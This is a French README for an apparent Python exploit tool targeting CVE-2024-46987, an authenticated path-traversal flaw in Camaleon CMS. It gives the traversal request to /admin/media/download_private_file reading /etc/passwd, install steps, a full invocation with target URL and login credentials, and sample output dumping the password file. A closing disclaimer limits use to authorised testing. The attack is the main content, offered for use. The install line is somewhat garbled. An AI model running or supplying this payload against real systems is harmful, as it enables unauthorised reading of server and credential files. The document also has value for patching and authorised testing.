
Exploit créé en Python
CVE-2024-46987 est une vulnérabilité de traversée de chemin authentifiée (CWE-22) dans Camaleon CMS (un système de gestion de contenu basé sur Ruby on Rails). Elle permet à un utilisateur connecté (même avec des privilèges limités) de lire des fichiers arbitraires sur le serveur via l'action MediaController#download_private_file.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:NUn attaquant disposant d'identifiants valides peut envoyer une requête spécialement conçue à : /admin/media/download_private_file?file=../../../../etc/passwd
pip install -r requirements.txtOU
pip install -r requests firepython cms-exploit.py \
--url http://target.local \
--username neal \
--password 'Caffery@123' \
--cmd /etc/passwd
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
Remarque : Le script suppose un formulaire de connexion de type Rails (user[email], user[password], authenticity_token). Ajustez les champs de la charge utile si votre cible utilise des noms personnalisés.
Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
Utilisez-le uniquement sur des systèmes qui vous appartiennent ou pour lesquels vous disposez d'une autorisation écrite explicite de test (par exemple, les programmes de bug bounty, les tests d'intrusion internes, les laboratoires comme HTB). Toute utilisation non autorisée peut enfreindre les lois. L'auteur n'est pas responsable d'un mauvais usage.